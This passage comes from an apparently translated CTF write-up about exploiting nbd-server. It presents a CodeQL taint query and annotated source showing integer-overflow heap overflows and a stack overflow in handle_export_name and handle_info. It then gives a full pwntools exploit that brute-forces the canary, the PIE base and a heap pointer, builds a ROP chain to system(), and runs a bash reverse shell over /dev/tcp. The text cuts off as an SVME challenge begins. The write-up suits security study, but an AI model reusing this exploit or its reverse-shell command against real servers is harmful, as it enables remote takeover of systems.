class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * Do the initial negotiation.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * @param net The socket we&#x27;re doing the negotiation over.</span></span><br><span class="line"><span class="comment"> * @param servers The array of known servers.</span></span><br><span class="line"><span class="comment"> * @param genconf the global options (needed for accessing TLS config data)</span></span><br><span class="line"><span class="comment"> **/</span></span><br><span class="line"><span class="function">CLIENT* <span class="title">negotiate</span><span class="params">(<span class="type">int</span> net, GArray* servers, <span class="keyword">struct</span> generic_conf *genconf)</span> </span>&#123;</span><br><span class="line">    <span class="type">uint16_t</span> smallflags = NBD_FLAG_FIXED_NEWSTYLE | NBD_FLAG_NO_ZEROES;</span><br><span class="line">    <span class="type">uint64_t</span> magic;</span><br><span class="line">    
<span class="type">uint32_t</span> cflags = <span class="number">0</span>;</span><br><span class="line">    <span class="type">uint32_t</span> opt;</span><br><span class="line">    <span class="comment">// Create and initialize the client structure</span></span><br><span class="line">    CLIENT* client = <span class="built_in">g_new0</span>(CLIENT, <span class="number">1</span>);</span><br><span class="line">    <span class="comment">// Assign the socket fd to the client</span></span><br><span class="line">    client-&gt;net = net;</span><br><span class="line">    client-&gt;socket_read = socket_read_notls;</span><br><span class="line">    client-&gt;socket_write = socket_write_notls;</span><br><span class="line">    client-&gt;socket_closed = socket_closed_negotiate;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">assert</span>(servers != <span class="literal">NULL</span>);</span><br><span class="line">    <span class="built_in">socket_write</span>(client, INIT_PASSWD, <span class="number">8</span>);</span><br><span class="line">    magic = <span class="built_in">htonll</span>(opts_magic);</span><br><span class="line">    <span class="built_in">socket_write</span>(client, &amp;magic, <span class="built_in">sizeof</span>(magic));</span><br><span class="line"></span><br><span class="line">    smallflags = <span class="built_in">htons</span>(smallflags);</span><br><span class="line">    <span class="built_in">socket_write</span>(client, &amp;smallflags, <span class="built_in">sizeof</span>(<span class="type">uint16_t</span>));</span><br><span class="line">    <span class="comment">// Read data from the client</span></span><br><span class="line">    <span class="built_in">socket_read</span>(client, &amp;cflags, <span class="built_in">sizeof</span>(cflags));</span><br><span class="line">    cflags = <span class="built_in">htonl</span>(cflags);</span><br><span class="line">    [...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>This lets us search globally for every use of
<code>socket_read</code> and audit each one. The function is not used often, with fewer than 20 call sites, so a manual audit goes quickly. The audit turns up 3 vulnerabilities.</p><blockquote><p>Note that TLS-related functions were ignored during the audit, because the remote server does not enable TLS.</p></blockquote><h4 id="b-漏洞">b. The bugs</h4><h5 id="0-codeql">0) codeql</h5><blockquote><p>author: sakura.</p></blockquote><p>I also wrote a quick CodeQL data-flow analysis. Two simple approaches come to mind. One treats the network byte-order conversion functions, such as <code>htonl</code>, as the source and <code>socket_read</code> as the sink, to check for size overflows.</p><p>The other treats the second argument of <code>socket_read</code>, the buffer that receives user input, as the source, and then checks whether the taint reaches a binary operation or the third argument of <code>socket_read</code>.</p><p>The QL here implements the latter.</p><p>While writing it I noticed that the data-flow analysis in CodeQL is fairly conservative, so some edges have to be connected by hand.</p><p><img src="https://sakura-1252236262.cos.ap-beijing.myqcloud.com/2022-01-26-074540.png" alt="sakuraimg"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span 
class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line">/**</span><br><span class="line"> * @kind path-problem</span><br><span class="line"> */</span><br><span class="line"></span><br><span class="line">import DataFlow::PathGraph</span><br><span class="line">import cpp</span><br><span class="line">import semmle.code.cpp.ir.dataflow.TaintTracking</span><br><span class="line"></span><br><span class="line">predicate htonlCallEdge(DataFlow::Node node1, DataFlow::Node node2) &#123;</span><br><span class="line">  exists(FunctionCall fc |</span><br><span class="line">    // fc.getTarget().getName() = &quot;htonl&quot; and</span><br><span class="line">    node1.asExpr() = fc.getAnArgument() and</span><br><span class="line">    node2.asExpr() = fc</span><br><span class="line">  )</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class MyDataFlowConfiguration extends TaintTracking::Configuration &#123;</span><br><span class="line">  MyDataFlowConfiguration() &#123; this = &quot;MyDataFlowConfiguration&quot; &#125;</span><br><span class="line"></span><br><span class="line">  override predicate isSource(DataFlow::Node source) &#123;</span><br><span class="line">    exists(FunctionCall fc | fc.getArgument(1) = source.asExpr() |</span><br><span class="line">      fc.getTarget().hasGlobalName(&quot;socket_read&quot;)</span><br><span class="line">    )</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  override predicate isSink(DataFlow::Node sink) &#123;</span><br><span class="line">    sink.asExpr().getLocation().toString().matches(&quot;%nbd-server%&quot;) and</span><br><span class="line">    sink.asExpr() instanceof BinaryArithmeticOperation</span><br><span class="line">    // exists(FunctionCall fc | fc.getArgument(2) = sink.asExpr() |</span><br><span class="line">    //   
fc.getTarget().hasGlobalName(&quot;socket_read&quot;)</span><br><span class="line">    // )</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  override predicate isAdditionalTaintStep(DataFlow::Node node1, DataFlow::Node node2) &#123;</span><br><span class="line">    htonlCallEdge(node1, node2)</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from MyDataFlowConfiguration config, DataFlow::PathNode source, DataFlow::PathNode sink</span><br><span class="line">where config.hasFlowPath(source, sink)</span><br><span class="line">select sink.getNode(), source, sink, &quot;&quot;</span><br></pre></td></tr></table></figure><h5 id="1-handle-export-name">1) handle_export_name</h5><p>A <strong>heap overflow</strong> caused by an <strong>integer overflow</strong> sits in the <code>handle_export_name</code> function:</p><blockquote><p>It allows a heap overflow of arbitrary length.</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> CLIENT* <span class="title">handle_export_name</span><span class="params">(CLIENT* client, <span class="type">uint32_t</span> opt, GArray* servers, <span class="type">uint32_t</span> cflags)</span> </span>&#123;</span><br><span class="line">    <span class="type">uint32_t</span> namelen;</span><br><span 
class="line">    <span class="type">char</span>* name;</span><br><span class="line">    <span class="type">int</span> i;</span><br><span class="line">    <span class="comment">// Read namelen from the client</span></span><br><span class="line">    <span class="built_in">socket_read</span>(client, &amp;namelen, <span class="built_in">sizeof</span>(namelen));</span><br><span class="line">    namelen = <span class="built_in">ntohl</span>(namelen);</span><br><span class="line">    <span class="keyword">if</span>(namelen &gt; <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="comment">// There is no integer overflow check here, so if namelen is 0xffffffff the size actually passed to malloc is 0</span></span><br><span class="line">        <span class="comment">// which results in a heap overflow</span></span><br><span class="line">        name = <span class="built_in">malloc</span>(namelen<span class="number">+1</span>);</span><br><span class="line">        name[namelen]=<span class="number">0</span>;</span><br><span class="line">        <span class="built_in">socket_read</span>(client, name, namelen);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        name = <span class="built_in">strdup</span>(<span class="string">&quot;&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    [...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h5 id="2-handle-info">2) handle_info</h5><p>This function contains two vulnerabilities. One is a <strong>heap overflow</strong> similar to the one above:</p><blockquote><p>Again, it allows a heap overflow of arbitrary length.</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span 
class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">bool</span> <span class="title">handle_info</span><span class="params">(CLIENT* client, <span class="type">uint32_t</span> opt, GArray* servers, <span class="type">uint32_t</span> cflags)</span> </span>&#123;</span><br><span class="line">    <span class="type">uint32_t</span> namelen, len;</span><br><span class="line">    <span class="type">char</span> *name;</span><br><span class="line">    <span class="type">int</span> i;</span><br><span class="line">    SERVER *server = <span class="literal">NULL</span>;</span><br><span class="line">    [...]</span><br><span class="line">    <span class="type">char</span> buf[<span class="number">1024</span>];</span><br><span class="line">    [...]</span><br><span class="line"></span><br><span class="line">    <span class="built_in">socket_read</span>(client, &amp;len, <span class="built_in">sizeof</span>(len));</span><br><span class="line">    len = <span class="built_in">htonl</span>(len);</span><br><span class="line">    <span class="comment">// 1. Read namelen from the remote peer</span></span><br><span
class="line">    <span class="built_in">socket_read</span>(client, &amp;namelen, <span class="built_in">sizeof</span>(namelen));</span><br><span class="line">    namelen = <span class="built_in">htonl</span>(namelen);</span><br><span class="line">    <span class="keyword">if</span>(namelen &gt; (len - <span class="number">6</span>)) &#123;</span><br><span class="line">        <span class="built_in">send_reply</span>(client, opt, NBD_REP_ERR_INVALID, <span class="number">-1</span>, <span class="string">&quot;An OPT_INFO request cannot be smaller than the length of the name + 6&quot;</span>);</span><br><span class="line">        <span class="built_in">socket_read</span>(client, buf, len - <span class="built_in">sizeof</span>(namelen));</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(namelen &gt; <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="comment">// 2. 1 is added without any overflow check; namelen = 0xffffffff leads to malloc(0) and a heap overflow</span></span><br><span class="line">        name = <span class="built_in">malloc</span>(namelen + <span class="number">1</span>);</span><br><span class="line">        <span class="comment">// *. Drawback: heap feng shui is needed to survive the out-of-bounds write at offset 0xffffffff, since it may trigger a SIGSEGV.</span></span><br><span
class="line">        name[namelen] = <span class="number">0</span>;</span><br><span class="line">        <span class="built_in">socket_read</span>(client, name, namelen);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        name = <span class="built_in">strdup</span>(<span class="string">&quot;&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    [...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The other is a <strong>stack overflow with an unrestricted overflow length</strong>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">bool</span> <span class="title">handle_info</span><span class="params">(CLIENT* client, <span class="type">uint32_t</span> opt, GArray* servers, <span class="type">uint32_t</span> cflags)</span> 
</span>&#123;</span><br><span class="line">    <span class="type">uint32_t</span> namelen, len;</span><br><span class="line">    <span class="type">char</span> *name;</span><br><span class="line">    <span class="type">int</span> i;</span><br><span class="line">    SERVER *server = <span class="literal">NULL</span>;</span><br><span class="line">    [...]</span><br><span class="line">    <span class="type">char</span> buf[<span class="number">1024</span>];</span><br><span class="line">    [...]</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 1. Read len from the remote peer</span></span><br><span class="line">    <span class="built_in">socket_read</span>(client, &amp;len, <span class="built_in">sizeof</span>(len));</span><br><span class="line">    len = <span class="built_in">htonl</span>(len);</span><br><span class="line">    <span class="comment">// 2. Read namelen from the remote peer</span></span><br><span class="line">    <span class="built_in">socket_read</span>(client, &amp;namelen, <span class="built_in">sizeof</span>(namelen));</span><br><span class="line">    namelen = <span class="built_in">htonl</span>(namelen);</span><br><span class="line">    <span class="comment">// 3. Enter the if branch</span></span><br><span class="line">    <span class="keyword">if</span>(namelen &gt; (len - <span class="number">6</span>)) &#123;</span><br><span class="line">        <span class="built_in">send_reply</span>(client, opt, NBD_REP_ERR_INVALID, <span class="number">-1</span>, <span class="string">&quot;An OPT_INFO request cannot be smaller than the length of the name + 6&quot;</span>);</span><br><span class="line">        <span class="comment">// 4. 
Read data from the client; len is attacker-controlled, so this overflows the stack buffer</span></span><br><span class="line">        <span class="built_in">socket_read</span>(client, buf, len - <span class="built_in">sizeof</span>(namelen));</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(namelen &gt; <span class="number">0</span>) &#123;</span><br><span class="line">        name = <span class="built_in">malloc</span>(namelen + <span class="number">1</span>);</span><br><span class="line">        name[namelen] = <span class="number">0</span>;</span><br><span class="line">        <span class="built_in">socket_read</span>(client, name, namelen);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        name = <span class="built_in">strdup</span>(<span class="string">&quot;&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    [...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="4-利用流程-2">4. Exploitation Flow</h3><ul><li><p>First, connect to the remote server, hand-craft the malicious fields to trigger the stack overflow, and brute-force the canary and the PIE base. From these, compute $addr_{ELF-base}$, $addr_{GOT}$, $addr_{system}$, $addr_{gadgets}$, and so on.</p></li><li><p>With these leaked, the command to execute must be passed to system. All the data we send is stored on the heap, the command included, so a heap address must be leaked as well.</p><p>Note that the stack frame of <code>handle_info</code> holds a saved r12 value that points to client; brute-forcing this stack slot yields a heap address.</p><blockquote><p>Note that communication with the remote goes over a socket, so the command cannot simply be <code>cat /flag</code>: the stdout of the executed command must be redirected to the socket fd of our connection.</p><p>The simplest approach is to spawn a <strong>reverse shell</strong> back to our own host.</p></blockquote></li><li><p>Finally, finish everything off with a single ROP chain.</p></li></ul><h3 id="5-Exploit">5. 
Exploit</h3><p>The exploit for this challenge is fairly interesting, so I tried writing it myself:</p><blockquote><p>Note that the offsets used in the exploit come from a self-compiled nbd-server.</p><p>I enabled the same mitigations at compile time as the remote binary has, so the internal offsets of the self-compiled nbd-server barely differ from those of the remote binary. The exploit therefore only needs a few offsets adjusted to work against the remote binary.</p></blockquote><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span 
class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br></pre></td><td class="code"><pre><span class="line"><span 
class="comment">#! python3</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(</span><br><span class="line">    terminal=[<span class="string">&#x27;gnome-terminal&#x27;</span>, <span class="string">&#x27;-x&#x27;</span>, <span class="string">&#x27;bash&#x27;</span>, <span class="string">&#x27;-c&#x27;</span>],</span><br><span class="line">    os=<span class="string">&#x27;linux&#x27;</span>,</span><br><span class="line">    arch=<span class="string">&#x27;amd64&#x27;</span>,</span><br><span class="line">    encoding=<span class="string">&#x27;latin&#x27;</span>,</span><br><span class="line">    endian=<span class="string">&quot;little&quot;</span>,       <span class="comment"># Note: network byte order is big-endian</span></span><br><span class="line">    log_level=<span class="string">&quot;info&quot;</span>,</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">stack layout:</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">- 0x400 bytes buf</span></span><br><span class="line"><span class="string">- 8 bytes unknown field</span></span><br><span class="line"><span class="string">- canary</span></span><br><span class="line"><span class="string">- 8 bytes unknown field</span></span><br><span class="line"><span class="string">- old_rbx</span></span><br><span class="line"><span class="string">- old_rbp</span></span><br><span class="line"><span class="string">- old_r12 : client_addr</span></span><br><span class="line"><span class="string">- old_r13</span></span><br><span class="line"><span class="string">- old_r14</span></span><br><span class="line"><span class="string">- old_r15</span></span><br><span class="line"><span class="string">- return addr</span></span><br><span class="line"><span 
class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">send_new_request</span>(<span class="params">payload</span>):</span><br><span class="line">    p = remote(<span class="string">&quot;127.0.0.1&quot;</span>, <span class="number">10809</span>)</span><br><span class="line">    cmd = <span class="string">b&#x27; &#x27;</span>*<span class="number">0x25</span> + <span class="string">b&quot;sleep 5; bash -c \&quot;bash -i &gt;&amp; /dev/tcp/127.0.0.1/8001 0&gt;&amp;1\&quot;&quot;</span></span><br><span class="line">    </span><br><span class="line">    p.send(p32(<span class="number">0</span>, endian=<span class="string">&quot;big&quot;</span>))                  <span class="comment"># cflags</span></span><br><span class="line">    p.send(<span class="string">b&quot;IHAVEOPT&quot;</span>)                           <span class="comment"># opt_magic</span></span><br><span class="line">    p.send(p32(<span class="number">7</span>, endian=<span class="string">&quot;big&quot;</span>))                  <span class="comment"># opt: NBD_OPT_GO</span></span><br><span class="line">    p.send(p32(<span class="built_in">len</span>(payload) + <span class="number">4</span>, endian=<span class="string">&quot;big&quot;</span>))   <span class="comment"># len</span></span><br><span class="line"></span><br><span class="line">    namelen = <span class="built_in">len</span>(payload)</span><br><span class="line">    p.send(p32(namelen, endian=<span class="string">&quot;big&quot;</span>))            <span class="comment"># namelen (&gt; (len - 6))</span></span><br><span class="line">    </span><br><span class="line">    p.send(payload)                               <span class="comment"># payload</span></span><br><span class="line"></span><br><span class="line">    padding_len = namelen - <span class="built_in">len</span>(cmd)</span><br><span class="line">    <span 
class="keyword">assert</span> padding_len &gt;= <span class="number">0</span></span><br><span class="line">    p.send(cmd + <span class="string">b&#x27;\x00&#x27;</span>*padding_len)             <span class="comment"># name 指针，用于存放执行 system 函数的命令参数</span></span><br><span class="line"></span><br><span class="line">    p.send(p16(<span class="number">0</span>, endian=<span class="string">&quot;big&quot;</span>))                  <span class="comment"># n_requests</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> p</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">exploit_stack_data</span>(<span class="params">payload, target_len=<span class="number">8</span></span>):</span><br><span class="line">    data = <span class="string">b&quot;&quot;</span></span><br><span class="line">    <span class="keyword">while</span> <span class="built_in">len</span>(data) &lt; target_len:</span><br><span class="line">        <span class="keyword">for</span> ch <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">256</span>):</span><br><span class="line">            p = send_new_request(payload + data + p8(ch))</span><br><span class="line">            p.clean()</span><br><span class="line"></span><br><span class="line">            log.info(<span class="string">&quot;Getting stack mem: &quot;</span> + \</span><br><span class="line">                <span class="built_in">hex</span>(<span class="built_in">int</span>.from_bytes(data,byteorder=<span class="string">&#x27;little&#x27;</span>)) + \</span><br><span class="line">                <span class="string">&quot;, ch: &quot;</span> + <span class="built_in">str</span>(ch))</span><br><span class="line">            <span class="keyword">try</span>:</span><br><span class="line">                p.recv(timeout=<span class="number">1</span>)</span><br><span class="line">              
  p.close()</span><br><span class="line">                data += p8(ch)</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">            <span class="keyword">except</span> EOFError:</span><br><span class="line">                p.close()</span><br><span class="line">            </span><br><span class="line">    <span class="keyword">return</span> data</span><br><span class="line">    </span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    b2i = <span class="keyword">lambda</span> addr : <span class="built_in">int</span>.from_bytes(addr,byteorder=<span class="string">&#x27;little&#x27;</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> <span class="literal">True</span>:</span><br><span class="line">        canary = p64(<span class="number">0x5af9ebae046ded00</span>)</span><br><span class="line">        client_addr = p64(<span class="number">0x555cbd36c9b0</span>)</span><br><span class="line">        ret_addr = p64(<span class="number">0x555cbbb901b7</span>)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        canary = <span class="literal">None</span></span><br><span class="line">        client_addr = <span class="literal">None</span></span><br><span class="line">        ret_addr = p8(<span class="number">0xb7</span>) <span class="comment"># 手动指定最后一个字节，提高爆破精度</span></span><br><span class="line">    ret_addr_offset = <span class="number">0x91B7</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> canary <span class="keyword">is</span> <span class="literal">None</span>:</span><br><span class="line">        canary = exploit_stack_data(<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x408</span>, target_len=<span 
class="number">8</span>)</span><br><span class="line">        log.info(<span class="string">&quot;=================================&quot;</span>)</span><br><span class="line">        log.success(<span class="string">&quot;canary: &quot;</span> + <span class="built_in">hex</span>(b2i(canary)))</span><br><span class="line">        <span class="built_in">input</span>()</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> client_addr <span class="keyword">is</span> <span class="literal">None</span>:</span><br><span class="line">        client_addr = exploit_stack_data(<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x408</span> + canary + <span class="string">b&#x27;b&#x27;</span>*<span class="number">0x18</span>, target_len=<span class="number">8</span>)</span><br><span class="line">        log.info(<span class="string">&quot;=================================&quot;</span>)</span><br><span class="line">        log.success(<span class="string">&quot;client addr: &quot;</span> + <span class="built_in">hex</span>(b2i(client_addr)))</span><br><span class="line">        <span class="built_in">input</span>()</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">len</span>(ret_addr) &lt; <span class="number">8</span>:</span><br><span class="line">        ret_addr += exploit_stack_data(</span><br><span class="line">            <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x408</span> + canary + <span class="string">b&#x27;b&#x27;</span>*<span class="number">0x18</span> + client_addr + <span class="string">b&#x27;c&#x27;</span>*<span class="number">0x18</span> + ret_addr, target_len=<span class="number">7</span>)</span><br><span class="line">        log.info(<span class="string">&quot;=================================&quot;</span>)</span><br><span class="line">        log.success(<span class="string">&quot;ret addr: &quot;</span> + <span 
class="built_in">hex</span>(b2i(ret_addr)))</span><br><span class="line">        <span class="built_in">input</span>()</span><br><span class="line"></span><br><span class="line">    elf = ELF(<span class="string">&quot;./nbd-server&quot;</span>)</span><br><span class="line">    elf.address = b2i(ret_addr) - ret_addr_offset</span><br><span class="line">    log.success(<span class="string">&quot;ELF base addr: &quot;</span> + <span class="built_in">hex</span>(elf.address))</span><br><span class="line">    <span class="keyword">assert</span> elf.address &amp; <span class="number">0xfff</span> == <span class="number">0</span></span><br><span class="line"></span><br><span class="line">    elf_rop = ROP(elf)</span><br><span class="line">    elf_rop.system(b2i(client_addr) + <span class="number">0x180</span>)</span><br><span class="line">    <span class="built_in">print</span>(elf_rop.dump())</span><br><span class="line"></span><br><span class="line">    log.info(<span class="string">&quot;Try getting reverse shell&quot;</span>)</span><br><span class="line">    p = send_new_request(<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x408</span> + canary + <span class="string">b&#x27;b&#x27;</span>*<span class="number">0x18</span> + client_addr + <span class="string">b&#x27;c&#x27;</span>*<span class="number">0x18</span> + elf_rop.chain())</span><br><span class="line">    p.interactive()</span><br></pre></td></tr></table></figure>
<p>The main pitfall is the <strong>brute forcing</strong>. It is the core of the whole exploit, but brute-forcing the low-address bytes is prone to false positives, so it is best to repeat the brute force several times. Three values need to be brute-forced:</p><ul><li><p>Canary: a single wrong byte aborts the process immediately, which is helpful for brute forcing. This is the easiest value to recover.</p></li><li><p>Return address: the lowest byte must be specified by hand to make the brute force more reliable. Its value can be read from IDA (note that pages are aligned to 0x1000).</p></li><li><p>Client address: when handle_info is called, the caller's r12, which holds the address of client, is saved on the stack (old r12), so a <code>pop r12</code> instruction executes before handle_info returns. We can brute-force this saved r12 to obtain the client address, then use a relative offset to find the address of the name buffer that stores the command for system.</p><p>Notes:</p><ul><li>The program calls socket_read frequently, and that function uses function pointers stored in client, so a client address that is off by even one byte causes a SIGSEGV, which is helpful for brute forcing.</li><li>In practice, however, the client address is quite prone to false positives and needs careful verification.</li></ul></li></ul><h2 id="四、SVME">IV. SVME</h2><h3 id="1-SVME-小叙">1. SVME Overview</h3><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Professor Terence Parr has taught us how to build a virtual machine. Now it&#x27;s time to break it!</span><br><span class="line">nc 47.243.140.252 1337</span><br><span class="line">attachment</span><br><span class="line"></span><br><span class="line">Clone-and-Pwn, Virtual Machine, difficulty:baby</span><br></pre></td></tr></table></figure><p>A simple open-source VM, baby difficulty.</p><h3 id="2-SVME-环境搭建">2. SVME Environment Setup</h3><p>The challenge provides a <a href="http://libc-2.31.so">libc-2.31.so</a> attachment and main.c:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdbool.h&gt;</span></span></span><br><span class="line"><span 